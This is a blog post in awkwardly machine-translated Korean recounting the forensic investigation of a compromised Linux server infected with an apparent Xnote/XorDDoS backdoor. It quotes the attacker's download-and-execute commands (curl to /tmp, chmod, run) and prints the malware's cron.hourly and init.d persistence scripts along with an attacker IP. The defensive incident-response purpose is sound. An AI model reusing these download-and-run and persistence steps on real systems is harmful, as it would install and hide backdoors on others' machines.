서버의 공격
6916 단어 DevOps
# root
history > history.log
#
curl ****/ /tmp/hei
chmod 744 hei
./hei
여기에 몇 가지 문제가 있습니다.
hei
파일의 ip
주소를 보았습니다. 강소성에 있는 것이지만 저희 서버는 내부에서 사용되고 외부 네트워크에 접근할 수 없습니다hei
파일이 /tmp
폴더에 다운로드되는 이유 #
service network restart
모든 것이 막 시작되었다.
메일부터.
이대로 끝날 줄 알았는데...어느 날 나는 루트 사용자가 항상 한 통의 메일을 받는데 대략 200통이 넘는다는 것을 발견했다. 내용은 같고 나는 수동으로 그것들을 삭제했다.
그러나 얼마 후, 나는 또 여러 통의 같은 우편물을 받았다.
메일을 자세히 보고 알겠습니다. 아래의 명령이 실행에 실패했습니다!
#
mail
#
& more
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug
/etc/cron.hourly
이 디렉터리에서 이cron을 발견했습니다.sh 파일
cd /etc/cron.hourly
#
stat cron.sh
etc/cron.hourly/cron.sh
파일 내용#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`;do ifconfig $i up& done
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug
for 순환이라는 명령은 모든 네트워크 카드를 다시 시작하는 것이 분명하다.
이 파일이 존재하지 않습니다.그래서cp라는 명령은 항상 실패하고 로그 시스템이 작용하기 때문에 시간마다 루트 계정에 메일을 보냅니다.
이 파일을 삭제한 후에 과연 다시 메일을 보내지 않았다
난 또 끝난 줄 알았어.
왜
/lib/udev/udev
이 파일이 사라졌는지 모르겠습니다. /lib/udev/udev
명령을 실행하고 시스템을 업데이트해서 이 파일이 없어졌기 때문입니까?원인을 나는 전혀 모른다.그러나, 어쨌든, 더 이상 메일을 보내지 않았습니다...
운명의 만남, 이것이 하늘의 뜻입니까
네트워크 명령부터
시간이 좀 지나서 인터넷 명령을 좀 배우고 싶어요.
yum update
명령을 사용할 때, 나는 갑자기 매우 이상한 IP 주소를 발견했다.ss -p
# *
SYN-SENT 0 1 *.*.*.*:50533 61.160.211.197:uaac users:(("654",21110,5))
여러 번 실행될 때
ss
이 포트가 끊임없이 바뀔 것50533
여러 가지 징후가 당신의 서버가 연결을 시도하고 있음을 나타낸다SYN-SENT
where are you
# ip pid
netstat -p | less
# ,
ps -aux | grep pid
#
ps -ef | grep pid
#
kill -9 pid
그러나 프로세스는 죽일 수 없었고, 몇 분 후에 다시 시작되었다
/etc/init.d
이 디렉터리를 검사하려면 파일을 숨겨야 합니다. 위의stat의 명령과 시스템이 다운되는 시간에 따라 시스템이 03월 21일에 공격을 받았음을 기본적으로 확인할 수 있습니다.
# 3/21
touch -t 201603210000.00 TT
find . -newer TT
# ls,
ls -al
다음과 같은 의문의 파일
61.160.211.197:uaac
이 발견되었습니다.#!/bin/sh
# chkconfig: 12345 90 90
# description: .chinaz{1458543822
### BEGIN INIT INFO
# Provides: .chinaz{1458543822
# Required-Start:
# Required-Stop:
# Default-Start: 1 2 3 4 5
# Default-Stop:
# Short-Description: .chinaz{1458543822
### END INIT INFO
case $1 in
start)
/tmp/.chinaz{1458543822
;;
stop)
;;
*)
/tmp/.chinaz{1458543822
;;
esac
이 서비스는
.chinaz\{1458543822
할 수 없고 서비스의 스크립트는 stop
에 있습니다. 제가 발견했을 때 이 스크립트는 이미 없습니다.하지만 전원을 켤 때 자동으로 생성될 것이다.그러나 우리는 여전히 얻은 것이 있다. 이것은 자동 시작 스크립트이다. 운행 단계 12345, 운행 번호 90가장 중요한 것은: 우리는 의미 있는 이름을 얻었다
/tmp
. 그것은 자신의 진짜 이름을 폭로했다!!!아주 오래된 마법 시대에, 어떤 신중한 무당도 자신의 진명 실성을 가장 소중히 여길 만한 밀장으로 간주하였으며, 동시에 자신의 생명에 대한 가장 큰 위협이기도 했다.
나타나라
발췌하다http://news.drweb.com/show/?i=9272&lng=en&c=5 To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor. 이 페이지는 이 바이러스를 소개했는데 리눅스입니다.BackDoor.Xnote.1의 변종.
Linux.BackDoor.Xnote.일:http://vms.drweb.com/virus/?_is=1&i=4323517
새로운 의혹, 모든 것이 아직 끝나지 않았다...
이것이 너의 진짜 이름이냐!
내장형 Rookit을 숨긴 DDoS 목마 분석http://www.freebuf.com/articles/system/58836.html
XorDDos 패밀리:http://www.aptno1.com/YC/102.html
https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html
Linux에서 무작위 10자 바이러스 제거http://blog.chinaunix.net/uid-20332519-id-4941140.html
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
Nginx 용기 배치nginx 용 기 를 끌 어 옵 니 다. dockerhub 의 미 러 를 통 해 우 리 는 Nginx 를 끌 어 내 고 시작 할 수 있 습 니 다. 용기 실행: 응용 배치 용기 위 에 있 는 Nginx 에 정적 파일...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.